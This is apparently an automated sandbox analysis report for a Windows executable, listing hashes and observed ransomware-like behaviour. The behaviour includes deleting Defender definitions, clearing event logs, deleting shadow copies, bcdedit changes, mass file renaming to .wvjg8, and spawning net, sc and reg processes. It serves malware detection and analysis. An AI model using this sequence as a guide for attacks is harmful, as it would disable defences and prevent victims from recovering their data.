Analysis
-
max time kernel
16s -
max time network
127s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
22-11-2021 11:25
Static task
static1
Behavioral task
behavioral1
Sample
44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
Resource
win10-en-20211014
General
-
Target
44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
-
Size
2.7MB
-
MD5
d8d33f00e7124fe123cc2a581000a2e6
-
SHA1
233ef1e48543dea370f543c08d7c1ff6adba6e47
-
SHA256
44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442
-
SHA512
726f6b154804755e7999d7ccdef8c0671d3a3b988dfeb54ca8f7090e791ef27056688aa9473771b85955932117ce0641eb9aca65d7a0e296b61382d5d804cc2b
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 296 MpCmdRun.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 320 bcdedit.exe 3868 bcdedit.exe -
Drops file in Program Files directory 64 IoCs
Processes:
44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exedescription ioc process File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_oQ-wDP89Cs00.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_6HrKbEfJRuY0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_Z3fo-0ZY6c00.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_Oww9pF0Q-sc0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_VwIp9faNSSY0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\sqlxmlx.rll 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\fr-FR\wab32res.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_F_XFM77bohY0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\eu.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_CGpWnkWtKwA0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\is.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_KoRV8HNmhc00.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\nn.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_dqrCfrnOmLU0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\ado\adojavas.inc 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_NsfjfqN4JPA0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\msadc\adcjavas.inc 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_jcolt4xjniI0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_8MWj2xTES9Y0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\Services\verisign.bmp.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_sV7_x6EMU200.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\readme.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_3bXwq3wofd80.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\msdasqlr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD__RLCrWwZIoQ0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_n-Jtk_KYw0w0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_NliiFHFTY3k0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\mk.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_aXhO9WezvJ80.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD__gfClGjURX80.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_UQ6FEs_-5Fc0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_l-c1FW_gz_40.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_-J7af6pBLS40.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\CloseDisable.dib.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_wOsZjJ0huOI0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\oledb32r.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_6B_qT-V2n-00.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\ado\msado25.tlb 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_QFP5qfYUO6M0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_d5J-nFHqMpE0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_QB-43lilGXU0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_Qnp1yB1uJNU0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_744Pk4ze8jA0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_kDpN-XnaGS00.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\sqlxmlx.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_ddkOSFpTwmI0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\History.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_DKbMBu7ckgg0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_uZt5FB95Dso0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_UaZGEf4RTbo0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\Services\verisign.bmp 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_DRu97PSBQtE0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_gZKOhCTeboY0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_MrmTydcahWQ0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\ext.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_5K4gZqDzkXM0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_uICZGaPeIWA0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-tw.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_DJJxKmXg40s0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\sqlxmlx.rll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqlxmlx.rll.mui 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msdaremr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_tucMoD5QbSU0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_5XkdE7DPLAo0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\th.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_0um_2YK92CI0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_ZW3UDf1-I6I0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\bg.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_m4vZaXNJM1U0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_ZBJUtnWx0BU0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\msdasqlr.dll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_9MJ5i93kf0k0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_-oXbb6sjW0k0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui.q5QU632a0_9P8SuzEN6GOxVB7aBhgfizt1Kkgu6U0oD_orSdBDv1Zbo0.wvjg8 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3924 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exepid process 1896 powershell.exe 1896 powershell.exe 1896 powershell.exe 1216 powershell.exe 1216 powershell.exe 1216 powershell.exe 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 832 wevtutil.exe Token: SeBackupPrivilege 832 wevtutil.exe Token: SeSecurityPrivilege 3340 wevtutil.exe Token: SeBackupPrivilege 3340 wevtutil.exe Token: SeSecurityPrivilege 2128 wevtutil.exe Token: SeBackupPrivilege 2128 wevtutil.exe Token: SeIncreaseQuotaPrivilege 2508 wmic.exe Token: SeSecurityPrivilege 2508 wmic.exe Token: SeTakeOwnershipPrivilege 2508 wmic.exe Token: SeLoadDriverPrivilege 2508 wmic.exe Token: SeSystemProfilePrivilege 2508 wmic.exe Token: SeSystemtimePrivilege 2508 wmic.exe Token: SeProfSingleProcessPrivilege 2508 wmic.exe Token: SeIncBasePriorityPrivilege 2508 wmic.exe Token: SeCreatePagefilePrivilege 2508 wmic.exe Token: SeBackupPrivilege 2508 wmic.exe Token: SeRestorePrivilege 2508 wmic.exe Token: SeShutdownPrivilege 2508 wmic.exe Token: SeDebugPrivilege 2508 wmic.exe Token: SeSystemEnvironmentPrivilege 2508 wmic.exe Token: SeRemoteShutdownPrivilege 2508 wmic.exe Token: SeUndockPrivilege 2508 wmic.exe Token: SeManageVolumePrivilege 2508 wmic.exe Token: 33 2508 wmic.exe Token: 34 2508 wmic.exe Token: 35 2508 wmic.exe Token: 36 2508 wmic.exe Token: SeIncreaseQuotaPrivilege 1104 wmic.exe Token: SeSecurityPrivilege 1104 wmic.exe Token: SeTakeOwnershipPrivilege 1104 wmic.exe Token: SeLoadDriverPrivilege 1104 wmic.exe Token: SeSystemProfilePrivilege 1104 wmic.exe Token: SeSystemtimePrivilege 1104 wmic.exe Token: SeProfSingleProcessPrivilege 1104 wmic.exe Token: SeIncBasePriorityPrivilege 1104 wmic.exe Token: SeCreatePagefilePrivilege 1104 wmic.exe Token: SeBackupPrivilege 1104 wmic.exe Token: SeRestorePrivilege 1104 wmic.exe Token: SeShutdownPrivilege 1104 wmic.exe Token: SeDebugPrivilege 1104 wmic.exe Token: SeSystemEnvironmentPrivilege 1104 wmic.exe Token: SeRemoteShutdownPrivilege 1104 wmic.exe Token: SeUndockPrivilege 1104 wmic.exe Token: SeManageVolumePrivilege 1104 wmic.exe Token: 33 1104 wmic.exe Token: 34 1104 wmic.exe Token: 35 1104 wmic.exe Token: 36 1104 wmic.exe Token: SeIncreaseQuotaPrivilege 1104 wmic.exe Token: SeSecurityPrivilege 1104 wmic.exe Token: SeTakeOwnershipPrivilege 1104 wmic.exe Token: SeLoadDriverPrivilege 1104 wmic.exe Token: SeSystemProfilePrivilege 1104 wmic.exe Token: SeSystemtimePrivilege 1104 wmic.exe Token: SeProfSingleProcessPrivilege 1104 wmic.exe Token: SeIncBasePriorityPrivilege 1104 wmic.exe Token: SeCreatePagefilePrivilege 1104 wmic.exe Token: SeBackupPrivilege 1104 wmic.exe Token: SeRestorePrivilege 1104 wmic.exe Token: SeShutdownPrivilege 1104 wmic.exe Token: SeDebugPrivilege 1104 wmic.exe Token: SeSystemEnvironmentPrivilege 1104 wmic.exe Token: SeRemoteShutdownPrivilege 1104 wmic.exe Token: SeUndockPrivilege 1104 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3672 wrote to memory of 4016 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 3672 wrote to memory of 4016 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 4016 wrote to memory of 3208 4016 net.exe net1.exe PID 4016 wrote to memory of 3208 4016 net.exe net1.exe PID 3672 wrote to memory of 1324 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 3672 wrote to memory of 1324 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 1324 wrote to memory of 1176 1324 net.exe net1.exe PID 1324 wrote to memory of 1176 1324 net.exe net1.exe PID 3672 wrote to memory of 1788 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 3672 wrote to memory of 1788 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 1788 wrote to memory of 2936 1788 net.exe net1.exe PID 1788 wrote to memory of 2936 1788 net.exe net1.exe PID 3672 wrote to memory of 692 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 3672 wrote to memory of 692 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 692 wrote to memory of 4052 692 net.exe net1.exe PID 692 wrote to memory of 4052 692 net.exe net1.exe PID 3672 wrote to memory of 3648 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 3672 wrote to memory of 3648 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 3648 wrote to memory of 3148 3648 net.exe net1.exe PID 3648 wrote to memory of 3148 3648 net.exe net1.exe PID 3672 wrote to memory of 3496 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 3672 wrote to memory of 3496 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 3496 wrote to memory of 3772 3496 net.exe net1.exe PID 3496 wrote to memory of 3772 3496 net.exe net1.exe PID 3672 wrote to memory of 3764 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 3672 wrote to memory of 3764 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 3764 wrote to memory of 2588 3764 net.exe net1.exe PID 3764 wrote to memory of 2588 3764 net.exe net1.exe PID 3672 wrote to memory of 2016 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 3672 wrote to memory of 2016 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 2016 wrote to memory of 2060 2016 net.exe net1.exe PID 2016 wrote to memory of 2060 2016 net.exe net1.exe PID 3672 wrote to memory of 1976 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 3672 wrote to memory of 1976 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe net.exe PID 1976 wrote to memory of 604 1976 net.exe net1.exe PID 1976 wrote to memory of 604 1976 net.exe net1.exe PID 3672 wrote to memory of 1736 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 1736 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 712 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 712 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 1872 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 1872 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 3812 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 3812 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 3936 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 3936 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 2440 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 2440 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 2192 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 2192 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 2524 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 2524 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 2328 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 2328 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe sc.exe PID 3672 wrote to memory of 1996 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe reg.exe PID 3672 wrote to memory of 1996 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe reg.exe PID 3672 wrote to memory of 3004 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe reg.exe PID 3672 wrote to memory of 3004 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe reg.exe PID 3672 wrote to memory of 2228 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe reg.exe PID 3672 wrote to memory of 2228 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe reg.exe PID 3672 wrote to memory of 2924 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe reg.exe PID 3672 wrote to memory of 2924 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe reg.exe PID 3672 wrote to memory of 2932 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe reg.exe PID 3672 wrote to memory of 2932 3672 44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe reg.exe
Processes
-
